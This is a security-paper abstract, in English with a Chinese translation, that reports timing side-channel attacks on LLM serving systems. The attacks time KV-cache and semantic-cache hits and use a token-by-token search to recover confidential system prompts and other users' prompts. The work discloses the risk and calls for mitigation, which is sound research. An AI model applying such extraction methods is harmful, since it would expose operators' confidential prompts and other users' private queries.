早鸟捉漏：揭示LLM服务系统中的时序侧信道 (The Early Bird Catches the Leak: Unveiling Timing Side Channels in LLM Serving Systems)

from arxiv, This work was first submitted for review on Sept. 5, 2024, and the initial version was uploaded to Arxiv on Sept. 30, 2024. The latest version has accepted for publication by IEEE Transactions on Information Forensics and Security (TIFS)

The wide deployment of Large Language Models (LLMs) has given rise to strong demands for optimizing their inference performance. Today's techniques serving this purpose primarily focus on reducing latency and improving throughput through algorithmic and hardware enhancements, while largely overlooking their privacy side effects, particularly in a multi-user environment. In our research, for the first time, we discovered a set of new timing side channels in LLM systems, arising from shared caches and GPU memory allocations, which can be exploited to infer both confidential system prompts and those issued by other users. These vulnerabilities echo security challenges observed in traditional computing systems, highlighting an urgent need to address potential information leakage in LLM serving infrastructures. In this paper, we report novel attack strategies designed to exploit such timing side channels inherent in LLM deployments, specifically targeting the Key-Value (KV) cache and semantic cache widely used to enhance LLM inference performance. Our approach leverages timing measurements and classification models to detect cache hits, allowing an adversary to infer private prompts with high accuracy. We also propose a token-by-token search algorithm to efficiently recover shared prompt prefixes in the caches, showing the feasibility of stealing system prompts and those produced by peer users. Our experimental studies on black-box testing of popular online LLM services demonstrate that such privacy risks are completely realistic, with significant consequences. Our findings underscore the need for robust mitigation to protect LLM systems against such emerging threats.

翻译：大型语言模型（LLM）的广泛部署催生了对优化其推理性能的强烈需求。当前服务于这一目标的技术主要集中于通过算法和硬件增强来降低延迟并提高吞吐量，却在很大程度上忽视了其隐私副作用，尤其是在多用户环境中。在我们的研究中，我们首次在LLM系统中发现了一组新的时序侧信道，这些信道源于共享缓存和GPU内存分配，可被利用来推断机密系统提示词以及其他用户发出的提示词。这些漏洞呼应了在传统计算系统中观察到的安全挑战，凸显了解决LLM服务基础设施中潜在信息泄露的迫切需求。在本文中，我们报告了旨在利用LLM部署中固有的此类时序侧信道的新型攻击策略，特别针对广泛用于提升LLM推理性能的键值（KV）缓存和语义缓存。我们的方法利用时序测量和分类模型来检测缓存命中，使得攻击者能够以高准确率推断私有提示词。我们还提出了一种逐令牌搜索算法，以高效恢复缓存中共享的提示词前缀，展示了窃取系统提示词及对等用户产生的提示词的可行性。我们对流行在线LLM服务进行的黑盒测试实验研究表明，此类隐私风险完全现实且后果严重。我们的发现强调了采取强有力缓解措施以保护LLM系统抵御此类新兴威胁的必要性。